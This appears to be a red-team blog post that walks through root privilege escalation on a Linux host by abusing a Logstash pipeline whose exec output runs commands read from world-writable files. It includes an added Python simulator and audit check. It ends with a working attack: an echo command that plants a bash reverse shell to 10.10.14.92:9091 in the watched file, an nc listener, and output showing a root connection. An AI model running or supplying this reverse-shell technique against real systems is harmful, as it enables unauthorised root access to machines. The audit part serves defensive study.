Hi Red Team
Today I am going to share how to do post-exploitation by abusing the Logstash configuration on the victim machine.
During post-exploitation enumeration with linpeas.sh I found that Logstash was running with root privileges.

Let's find out more about the Logstash configuration. The pipeline files are normally located in /etc/logstash/conf.d/.

Let's check the input.conf
  input {
    file {
      path => "/opt/kibana/logstash_*"
      start_position => "beginning"
      sincedb_path => "/dev/null"
      stat_interval => "10 second"
      type => "execute"
      mode => "read"
    }
  }
Let's check the filter.conf
  filter {
    if [type] == "execute" {
      grok {
        match => { "message" => "Exec_This\s*Command\s*:\s+%{GREEDYDATA:Command}" }
      }
    }
  }
Let's check the output.conf
  output {
    if [type] == "execute" {
      stdout { codec => json }
      exec {
        command => "%{Command} &"
      }
    }
  }
Putting the three files together: the file input reads every file under /opt/kibana whose name starts with logstash_, polling the path every 10 seconds (stat_interval) and tagging each line with type "execute". The grok filter matches lines of the form "Exec_This Command : [COMMAND]" and stores [COMMAND] in the Command field. Finally the exec output runs "%{Command} &" through a shell for every event of type execute, so whatever we write after "Exec_This Command :" is executed by the Logstash process, which is running as root. Two details matter in practice: the exec output is gated only on the type, so a line that does not match the grok pattern still triggers exec with the unresolved literal %{Command} (harmless noise, but it shows that every line in the file reaches the shell), and with mode => "read" the input consumes the whole file and, under the default file_completed_action of delete, removes it once it has been processed, so do not be surprised when the payload file disappears.
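To make the pipeline behaviour concrete, here is an added Python example (not code from the post and not part of Logstash) that replays the three files above against a few constructed log lines and prints exactly which string the exec output would hand to a shell for each one, including a line that does not match the grok pattern. It also flags the dangerous combination statically, which is the check a defender would want to run over /etc/logstash/conf.d. The grok-to-regex conversion and the %{field} interpolation are simplified assumptions that cover only the constructs this pipeline uses.

```python
import re

# Constructed copies of the three pipeline files shown in the post (sample input,
# not read from /etc/logstash/conf.d).
INPUT_CONF = """input {
  file {
    path => "/opt/kibana/logstash_*"
    start_position => "beginning"
    sincedb_path => "/dev/null"
    stat_interval => "10 second"
    type => "execute"
    mode => "read"
  }
}"""

FILTER_CONF = r"""filter {
  if [type] == "execute" {
    grok {
      match => { "message" => "Exec_This\s*Command\s*:\s+%{GREEDYDATA:Command}" }
    }
  }
}"""

OUTPUT_CONF = """output {
  if [type] == "execute" {
    stdout { codec => json }
    exec {
      command => "%{Command} &"
    }
  }
}"""

# Assumption: only the grok pattern this pipeline uses is supported.
GROK_PATTERNS = {"GREEDYDATA": r".*"}
GROK_REF = re.compile(r"%\{(\w+)(?::(\w+))?\}")


def grok_to_regex(pattern):
    """Expand %{NAME:field} references into a Python regex with named groups."""
    def expand(m):
        body = GROK_PATTERNS[m.group(1)]
        return f"(?P<{m.group(2)}>{body})" if m.group(2) else f"(?:{body})"
    return re.compile(GROK_REF.sub(expand, pattern))


def grok_match_pattern(filter_conf):
    """Pull the grok match expression for the message field out of filter.conf."""
    m = re.search(r'match\s*=>\s*\{\s*"message"\s*=>\s*"([^"]*)"', filter_conf)
    if not m:
        raise ValueError("no grok match on [message]")
    return m.group(1)


def exec_command_template(output_conf):
    """Return the command string of the exec output, or None if there is none."""
    m = re.search(r'exec\s*\{\s*command\s*=>\s*"([^"]*)"', output_conf)
    return m.group(1) if m else None


def sprintf(template, event):
    """Logstash-style %{field} interpolation; a missing field is left as the literal reference."""
    return re.sub(r"%\{(\w+)\}", lambda m: str(event.get(m.group(1), m.group(0))), template)


def simulate(lines, filter_conf=FILTER_CONF, output_conf=OUTPUT_CONF):
    """For each line read from a logstash_* file, return the string the exec output hands to a shell."""
    regex = grok_to_regex(grok_match_pattern(filter_conf))
    template = exec_command_template(output_conf)
    commands = []
    for line in lines:
        event = {"message": line, "type": "execute"}
        m = regex.search(line)          # grok is an unanchored search, like re.search
        if m:
            event.update(m.groupdict())
        else:
            event["tags"] = ["_grokparsefailure"]
        # The output is gated only on [type], so exec runs even when grok failed.
        commands.append(sprintf(template, event))
    return commands


def audit(input_conf, output_conf):
    """Static check: an exec output whose command is built from event fields, fed by a file input."""
    findings = []
    template = exec_command_template(output_conf)
    if template and "%{" in template:
        findings.append(f"exec output runs an event-controlled command: {template!r}")
        path = re.search(r'path\s*=>\s*"([^"]*)"', input_conf)
        if path:
            findings.append(f"anyone who can write {path.group(1)} chooses that command")
    return findings


# Constructed sample lines, mirroring the payload file from the post.
SAMPLE_LINES = [
    "Exec_This Command : bash -i >& /dev/tcp/10.10.14.92/9091 0>&1",
    "Exec_ThisCommand:   id > /tmp/whoami.txt",   # \s* tolerates the missing spaces
    "Exec_This Command :id",                      # \s+ after the colon needs a space
    "plain log line without the trigger",
]

if __name__ == "__main__":
    for line, cmd in zip(SAMPLE_LINES, simulate(SAMPLE_LINES)):
        print(f"{line!r:65} -> {cmd!r}")
    for finding in audit(INPUT_CONF, OUTPUT_CONF):
        print("FINDING:", finding)
```

Running it shows the first two lines turning into real shell commands, while the third (no space after the colon) and the fourth fall through grok and reach the shell as the literal "%{Command} &". The audit function is the part to keep: point it at any pipeline whose exec output interpolates event fields and whose input is a path unprivileged users can write.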
To exploit this configuration we create a file in /opt/kibana whose name matches the glob, /opt/kibana/logstash_execute, containing a trigger line with a reverse shell as the command:
echo 'Exec_This Command : bash -i >& /dev/tcp/10.10.14.92/9091 0>&1' > /opt/kibana/logstash_execute
Start a nc listener on your machine first so the shell has somewhere to land. Logstash polls the path every 10 seconds, but new files are only discovered every discover_interval polls (15 by default), so it can take a couple of minutes before the Logstash process, running as root, reads the file and executes the command.
$ rlwrap nc -nlvp 9091
listening on [any] 9091 ...
connect to [10.10.14.92] from (UNKNOWN) [10.129.175.228] 41724
We got the reverse connection as root. Run id in the new shell to confirm it is uid 0 before going any further.
